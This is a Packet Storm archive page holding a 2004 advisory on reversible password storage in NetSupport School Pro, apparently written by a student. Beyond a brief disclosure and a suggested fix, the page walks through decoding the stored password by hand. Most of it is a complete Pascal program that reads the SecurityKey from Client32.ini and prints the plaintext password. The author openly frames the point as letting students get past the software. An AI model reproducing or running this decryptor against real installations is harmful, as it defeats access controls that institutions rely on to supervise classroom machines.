exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

netsupport.txt

netsupport.txt
Posted Mar 27, 2004
Authored by spiffomatic 64

Invision NetSupport School Pro stores passwords in a manner that allows their encryption to be easily reversed. Exploit written in Pascal is included.

tags | exploit
SHA-256 | eebc0c7480c35293df0babcb826181b8e49fd1c0911c945d3fcdd53716fc2014

netsupport.txt

Change Mirror Download
To the moderator, this is my first bugtraq posting, feel free to make any 
changes you feel nessessary to make this more helpful. Thank you very much

Vendor : NetSupport
URL : http://www.netsupport-inc.com/
Version : Invision NetSupport School Pro
Risk : Password protection weakness

Description: NetSupport School, market leading training tool for the modern
classroom featuring full student remote control, application & internet
monitoring, customized student testing and more.

Password protection weakness: The password encryption method is a method
which is easily reversed. The encryption method is as follows:
The letters are expressed using a hexadecimal type of system. Every letter
is shown by two characters the first character can be any ascii character
while the second is in a range from a-p. This works just like hex in that
ap+1=ba. Its not case sensitive so that also makes it easier for kids to get
passes. The characters start at EM. So A= EM B=EN and so on. Each letter is
also added to by the number of letters in front of it. So the crypt of aa=
EN9O while the crypt of aaa=EO9P>A. I can figure the routine used for the
crypt of each colum though. Here is a reference for the letter a and its
crypt of each colum EM, 9O, >a, BC, FE, :G, >I, BK, FM, :O. Based on this
knowledge and the hex-esque characters, and the addition to each char based
on the amount of letters in front of it, you can get the password from an
encrypted one. An example of a cracked password: The crypt is “GC;H@KEO” GC
-3 = FP (according to the hexish system) FP=T so the first letter is T. Take
9O (known “a” for the 2nd column) and add the difference from a-t to it (19)
and you get ;B add 2 to it (amount of letters in front of it) = ;D then
subtract ;D from ;H you get 4 places. A+4 = E the second letter is “E” you
continue to do this until you get the password “test”

Solution: based on my research this program uses a hash type validation
method, so the quickest and most painless solution would be to use the md5
routine for passwords.

Credits: Credits go to Drexel University, and Harry Hoffman because if they
hadn’t have used this software I would have never had the urge to circumvent
it ;)
As well as Mr. Flynn for teaching me pascal (even though its 20+ years old
its still my favorite)




Spiffomatic64
Hacking is an art-form


Here is a program that will decrypt the password off of a machine with the
software running:
(old school :-D its written in pascal)

program exploit;
uses crt;
var i,j,length,x,y,crazy:integer;
passfile:text;
line:string;
password,p:array [1..100] of char;
known,convert:array [1..26,1..3] of char;
ch,tempx,tempy,key:char;

procedure conv;
begin
convert[1,1]:='E';
convert[1,2]:='M';
convert[1,3]:='A';
for i:=2 to 26 do begin
if convert[i-1,2]='P' then begin
convert[i,1]:=chr(ord(convert[i-1,1])+1);
convert[i,2]:='A';
end
else begin
convert[i,1]:=convert[i-1,1];
convert[i,2]:=chr(ord(convert[i-1,2])+1);
end;
convert[i,3]:=chr(ord(convert[i-1,3])+1);
end;
end;

procedure hex(a,b:char; num:integer);
begin
if num>0 then begin
for i:=1 to num do begin
if b='P' then begin
b:='A';
a:=chr(ord(a)+1);
end else inc(b);
end;
end;
if num<0 then begin
for i:=-1 downto num do begin
if b='A' then begin
b:='P';
a:=chr(ord(a)-1);
end else dec(b);
end;
end;
tempx:=a;
tempy:=b;
end;

function compare(a,b:char):char;
begin
for i:=1 to 26 do begin
if (a=convert[i,1])and(b=convert[i,2]) then compare:=chr(i+64);
end;
end;

function diff(a,b,c,d:char):integer;
var num1,num2,num3:integer;
begin
num1:=ord(a)*16+ord(b);
num2:=ord(c)*16+ord(d);
num2:=num2;
diff:=num2-num1;
end;


Begin
{get the hash from client32.ini}
clrscr;
Writeln(' _________________________________________________________');
Writeln('|NetSupport School Pro Password decryptor |');
Writeln('|Credits goto: Drexel University, Harry Hoffman, Mr. Flynn|');
Writeln('|and my wonderful fiance Halley |');
Writeln(' ---------------------------------------------------------');
Writeln('');
assign (passfile,'C:\Progra~1\NetSup~1\Client32.ini');
reset (passfile);
i:=0;
while not eof(passfile) do
begin
line:='';
while not EoLn(passfile) do
begin
Read(passfile, ch);
line:=line+ch;
if line='SecurityKey=' then begin
while not eoln(passfile) do
begin
inc(i);
read(passfile,ch);
password[i]:=ch;
end;
length:=i;
end;
end;
readln(passfile,line);
end;
write('Hash: ');
for i:=1 to length do write(password[i]);
writeln('');
{decrypt the hash}
conv;
known[1,1]:='E';
known[1,2]:='M';
known[2,1]:='9';
known[2,2]:='O';
known[3,1]:='>';
known[3,2]:='A';
known[4,1]:='B';
known[4,2]:='C';
known[5,1]:='F';
known[5,2]:='E';
known[6,1]:=':';
known[6,2]:='G';
known[7,1]:='>';
known[7,2]:='I';
known[8,1]:='B';
known[8,2]:='K';
known[9,1]:='F';
known[9,2]:='M';
known[10,1]:=':';
known[10,2]:='O';
known[11,1]:='?';
known[11,2]:='A';
known[12,1]:='C';
known[12,2]:='C';
known[13,1]:='G';
known[13,2]:='E';
known[14,1]:=';';
known[14,2]:='G';
known[15,1]:='?';
known[15,2]:='I';
{get the first char}
for i:=1 to round(length/2) do p[i]:=chr(65);
for x:=1 to round(length/2) do begin
crazy:=0;
crazy:=-(round(length/2))+x;
for y:=1 to round(length/2) do crazy:=crazy-(ord(p[y])-65);
hex(password[x*2-1],password[x*2],crazy);
p[x]:=chr(diff(known[x,1],known[x,2],tempx,tempy)+65);
end;
writeln('');
write('Password: ');
for i:=1 to round(length/2) do begin
write(p[i]);
end;
readkey;

end.

_________________________________________________________________
Get tax tips, tools and access to IRS forms – all in one place at MSN Money!
http://moneycentral.msn.com/tax/home.asp
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close